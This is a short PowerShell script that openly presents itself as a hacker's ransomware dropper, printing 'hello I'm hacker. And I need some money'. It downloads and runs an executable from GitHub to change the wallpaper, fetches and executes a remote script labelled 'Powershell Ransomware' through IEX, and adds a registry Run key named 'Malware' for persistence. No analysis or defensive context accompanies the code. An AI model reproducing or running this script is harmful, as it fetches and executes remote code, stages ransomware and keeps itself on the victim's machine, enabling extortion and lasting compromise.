# First shit write-host "hello I'm hacker. And I need some money`n"; write-host "1. Wallpaper Change.`n`n"; (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/esby97/dakuo_powershell/master/SetWallpaper.exe', 'C:\merong.exe'); (New-Object System.Net.WebClient).DownloadFile('https://i.imgur.com/RjGEkYZ.jpg', 'C:\ani.jpg'); Start-Process "C:\merong.exe" "C:\ani.jpg"; # Second shit write-host "2. Powershell Ransomware.`n`n"; IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/esby97/powershell_malware/master/malware2.ps1'); # Third shit write-host "3. Set Registry Run Key.`n`n"; $origin_path = "$env:USERPROFILE\Desktop\README.lnk"; $new_path = "$env:TEMP\super_secret.lnk"; Copy-Item -Path $origin_path -Destination $new_path $registry_run_key = "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" New-ItemProperty -Path $registry_run_key -Name Malware -PropertyType String -Value $new_path write-host "`n`nFinished!!`n`n";